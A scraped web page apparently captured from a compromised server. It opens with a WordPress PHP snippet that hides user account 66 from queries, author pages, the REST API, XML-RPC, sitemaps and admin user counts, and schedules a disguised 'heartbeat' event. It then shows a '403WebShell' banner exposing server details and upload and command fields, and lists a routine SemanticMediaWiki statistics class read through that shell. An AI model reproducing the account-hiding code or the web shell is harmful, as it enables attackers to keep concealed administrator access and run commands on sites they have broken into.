add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/extensions/SemanticMediaWiki/src/SQLStore/Lookup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/extensions/SemanticMediaWiki/src/SQLStore/Lookup/TableStatisticsLookup.php
<?php

namespace SMW\SQLStore\Lookup;

use SMW\SQLStore\SQLStore;
use SMWDataItem as DataItem;
use SMWQuery as Query;

/**
 * @license GPL-2.0-or-later
 * @since 3.1
 *
 * @author mwjames
 */
class TableStatisticsLookup {

	/**
	 * @var SQLStore
	 */
	private $store;

	/**
	 * @since 3.1
	 *
	 * @param SQLStore $store
	 */
	public function __construct( SQLStore $store ) {
		$this->store = $store;
	}

	/**
	 * @since 3.1
	 *
	 * @return array
	 */
	public function getStats() {
		return $this->loadFromDB( $this->store->getConnection( 'mw.db' ) );
	}

	/**
	 * @since 3.1
	 *
	 * @return array
	 */
	public function get( $key ) {
		return $this->{$key}( $this->store->getConnection( 'mw.db' ) );
	}

	private function loadFromDB( $connection ) {
		$start_time = -microtime( true );
		$duplicates = $this->store->getObjectIds()->findDuplicates();

		if ( isset( $duplicates[SQLStore::ID_TABLE] ) ) {
			$duplicate_count = count( $duplicates[SQLStore::ID_TABLE] );
		} else {
			$duplicate_count = 0;
		}

		// Gets the last ID currently in use
		$last_id = $this->last_id( $connection );

		// Counts rows currently available in the id_table
		$rows_total_count = $this->rows_total_count( $connection );

		// Counts the rows currently marked as disposable
		$rows_delete_count = $this->rows_delete_count( $connection );

		// Counts the rows currently marked as redirects
		$rows_redirect_count = $this->rows_redirect_count( $connection );

		// Counts rows that have a revision_id assigned indicating
		// a direct wikipage link
		$rows_rev_count = $this->rows_rev_count( $connection );

		// Aggregate the row count for each namespace
		$rows_group_by_namespace = $this->rows_group_by_namespace( $connection );

		// Counts the total rows in the query_links table
		$rows_query_links_total_count = $this->rows_query_links_total_count( $connection );

		/**
		 * @note `Query::ID_PREFIX . '%'` queries are expensive but there is no
		 * other indicator available to cross reference with what is recorded in
		 * the id_table to identify those objects that represent a query entity.
		 */

		// Counts those subobjects identified as representing a query but are
		// missing an table entry == unlinked (floating reference)
		$unlinked_query_proptable_hash_count = $this->unlinked_query_proptable_hash_count( $connection );

		// Count those subobjects identified as representing a query that have
		// a recorded table entry == linked
		$linked_query_proptable_hash_count = $this->linked_query_proptable_hash_count( $connection );

		// Counts query links that are active by linking entries from the
		// query_links table with that of the id_table
		$active_query_links_count = $this->active_query_links_count( $connection );

		// Counts those IDs in the query_links table that have no subobject
		// representation in the id_table == invalid links, simple page references
		// instead of subobject references
		$invalid_query_links_count = $this->invalid_query_links_count( $connection );

		// Counts query_links table IDs that have no ID assigned in the id_table
		// == unassigned, lost
		$unassigned_query_links_count = $this->unassigned_query_links_count( $connection );

		// Count specific aspects of the blob table
		$blobTable = $this->store->findDiTypeTableId(
			DataItem::TYPE_BLOB
		);

		$rows_blob_table_total_count = $this->rows_blob_table_total_count( $connection, $blobTable );
		$blob_field_null_row_count = $this->blob_field_null_row_count( $connection, $blobTable );
		$unique_hash_field_terms_in_percent = 0;

		[ $hash_field_multi_occurrence_total_count, $hash_field_single_occurrence_total_count ] = $this->hash_field_count(
			$connection,
			$blobTable
		);

		if ( $rows_blob_table_total_count > 0 ) {
			$unique_hash_field_terms_in_percent = round(
				( 1 - ( ( ( $rows_blob_table_total_count - $hash_field_single_occurrence_total_count ) / $rows_blob_table_total_count ) ) ) * 100,
				2
			);
		}

		$snapshot_date = new \DateTime( 'now' );

		$stats = [
			SQLStore::ID_TABLE => [
				'total_row_count' => $rows_total_count,
				'last_id' => $last_id,
				'duplicate_count' => $duplicate_count,
				'rows' => [
					'rev_count' => $rows_rev_count,
					'smw_namespace_group_by_count' => $rows_group_by_namespace,
					'smw_iw' => [
						'delete_count' => $rows_delete_count,
						'redirect_count' => $rows_redirect_count,
					],
					'smw_proptable_hash' => [
						'query_match_count' => $linked_query_proptable_hash_count,
						'query_null_count' => $unlinked_query_proptable_hash_count,
					]
				]
			],
			SQLStore::QUERY_LINKS_TABLE => [
				'total_row_count' => $rows_query_links_total_count,
				'rows' => [
					'active_links_count' => $active_query_links_count,
					'invalid_links_count' => $invalid_query_links_count,
					'unassigned_count' => $unassigned_query_links_count,
				],
			],
			$blobTable => [
				'total_row_count' => $rows_blob_table_total_count,
				'unique_terms_occurrence_in_percent' => $unique_hash_field_terms_in_percent,
				'rows' => [
					'blob_field_null_row_count' => $blob_field_null_row_count,
					'terms_occurrence' => [
						'single_occurrence_total_count' => $hash_field_single_occurrence_total_count,
						'multi_occurrence_total_count' => $hash_field_multi_occurrence_total_count
					]
				]
			],
			'meta' => [
				'query_time' => round( microtime( true ) + $start_time, 5 ),
				'snapshot_date' => $snapshot_date->format( 'Y-m-d H:i:s' )
			],
		];

		return $stats;
	}

	private function last_id( $connection ) {
		return (int)$connection->selectField(
			SQLStore::ID_TABLE,
			'MAX(smw_id)',
			'',
			__METHOD__
		);
	}

	private function rows_total_count( $connection ) {
		return (int)$connection->selectField(
			SQLStore::ID_TABLE,
			'Count(*)',
			'',
			__METHOD__
		);
	}

	private function rows_delete_count( $connection ) {
		return (int)$connection->selectField(
			SQLStore::ID_TABLE,
			'Count(*)',
			[
				'smw_iw' => SMW_SQL3_SMWDELETEIW
			],
			__METHOD__
		);
	}

	private function rows_redirect_count( $connection ) {
		return (int)$connection->selectField(
			SQLStore::ID_TABLE,
			'Count(*)',
			[
				'smw_iw' => SMW_SQL3_SMWREDIIW
			],
			__METHOD__
		);
	}

	private function rows_rev_count( $connection ) {
		return (int)$connection->selectField(
			SQLStore::ID_TABLE,
			'Count(*)',
			[
				'smw_rev IS NOT NULL'
			],
			__METHOD__
		);
	}

	private function rows_group_by_namespace( $connection ) {
		$res = $connection->select(
			SQLStore::ID_TABLE,
			[
				'smw_namespace',
				'Count(*) as count'
			],
			[],
			__METHOD__,
			[
				'GROUP BY' => 'smw_namespace'
			]
		);

		$rows_group_by_namespace = [];

		foreach ( $res as $row ) {
			$rows_group_by_namespace[$row->smw_namespace] = (int)$row->count;
		}

		return $rows_group_by_namespace;
	}

	private function rows_query_links_total_count( $connection ) {
		return (int)$connection->selectField(
			SQLStore::QUERY_LINKS_TABLE,
			'Count(*)',
			'',
			__METHOD__
		);
	}

	private function unlinked_query_proptable_hash_count( $connection ) {
		return (int)$connection->selectField(
			SQLStore::ID_TABLE,
			'Count(*)',
			[
				'smw_subobject LIKE ' . $connection->addQuotes( Query::ID_PREFIX . '%' ),
				'smw_proptable_hash IS NULL'
			],
			__METHOD__
		);
	}

	private function linked_query_proptable_hash_count( $connection ) {
		return (int)$connection->selectField(
			SQLStore::ID_TABLE,
			'Count(*)',
			[
				'smw_subobject LIKE ' . $connection->addQuotes( Query::ID_PREFIX . '%' ),
				'smw_proptable_hash IS NOT NULL'
			],
			__METHOD__
		);
	}

	private function active_query_links_count( $connection ) {
		$row = $connection->selectRow(
			[ SQLStore::QUERY_LINKS_TABLE, SQLStore::ID_TABLE ],
			'COUNT(*) as count',
			[
				'smw_subobject LIKE ' . $connection->addQuotes( Query::ID_PREFIX . '%' ),
			],
			__METHOD__,
			[],
			[
				SQLStore::QUERY_LINKS_TABLE => [
					'INNER JOIN', "s_id=smw_id"
				]
			]
		);

		return (int)$row->count;
	}

	private function invalid_query_links_count( $connection ) {
		$row = $connection->selectRow(
			[ SQLStore::QUERY_LINKS_TABLE, SQLStore::ID_TABLE ],
			'COUNT(*) as count',
			[
				"smw_subobject=''"
			],
			__METHOD__,
			[],
			[
				SQLStore::QUERY_LINKS_TABLE => [
					'INNER JOIN', "s_id=smw_id"
				]
			]
		);

		return (int)$row->count;
	}

	private function unassigned_query_links_count( $connection ) {
		$row = $connection->selectRow(
			[ SQLStore::QUERY_LINKS_TABLE, SQLStore::ID_TABLE ],
			'COUNT(*) as count',
			[
				"smw_id IS NULL"
			],
			__METHOD__,
			[],
			[
				SQLStore::ID_TABLE => [
					'LEFT JOIN', "smw_id=s_id"
				]
			]
		);

		return (int)$row->count;
	}

	private function rows_blob_table_total_count( $connection, $blobTable ) {
		return (int)$connection->selectField(
			$blobTable,
			'Count(o_hash)',
			[],
			__METHOD__
		);
	}

	private function blob_field_null_row_count( $connection, $blobTable ) {
		return (int)$connection->selectField(
			$blobTable,
			'Count(o_hash)',
			[
				'o_blob' => null
			],
			__METHOD__
		);
	}

	private function hash_field_count( $connection, $blobTable ) {
		$hash_field_multi_occurrence_total_count = 0;
		$hash_field_single_occurrence_total_count = 0;

		/**
		 * Count the rows of those that have been grouped with a multiple
		 * occurrence.
		 *
		 * https://dev.mysql.com/doc/refman/8.0/en/derived-tables.html
		 *
		 * SELECT COUNT(count) as count
		 *  FROM (
		 *    SELECT COUNT(o_hash) AS count FROM `smw_di_blob` GROUP BY o_hash HAVING COUNT(*) > 1
		 *  ) AS t1
		 */
		$sub_query = $connection->newQuery();
		$sub_query->type( 'SELECT' );
		$sub_query->table( $blobTable );
		$sub_query->field( 'COUNT(o_hash)', 'count' );
		$sub_query->options(
			[
				'GROUP BY' => 'o_hash',
				'HAVING' => 'COUNT(*) > 1'
			]
		);

		$query = $connection->newQuery();
		$query->type( 'SELECT' );
		$query->table( $sub_query->getSQL(), 't1' );
		$query->field( 'COUNT(count) as count' );

		foreach ( $query->execute( __METHOD__ ) as $row ) {
			$hash_field_multi_occurrence_total_count = (int)$row->count;
		}

		/**
		 * Count the rows of those that have been grouped with a single
		 * occurrence.
		 *
		 * SELECT COUNT(count) as count
		 *  FROM (
		 *    SELECT COUNT(o_hash) AS count FROM `smw_di_blob` GROUP BY o_hash HAVING COUNT(*) = 1
		 *  ) AS t1
		 */
		$sub_query = $connection->newQuery();
		$sub_query->type( 'SELECT' );
		$sub_query->table( $blobTable );
		$sub_query->field( 'COUNT(o_hash)', 'count' );
		$sub_query->options(
			[
				'GROUP BY' => 'o_hash',
				'HAVING' => 'COUNT(*) = 1'
			]
		);

		$query = $connection->newQuery();
		$query->type( 'SELECT' );
		$query->table( $sub_query->getSQL(), 't1' );
		$query->field( 'COUNT(count) as count' );

		foreach ( $query->execute( __METHOD__ ) as $row ) {
			$hash_field_single_occurrence_total_count = (int)$row->count;
		}

		return [
			$hash_field_multi_occurrence_total_count,
			$hash_field_single_occurrence_total_count
		];
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit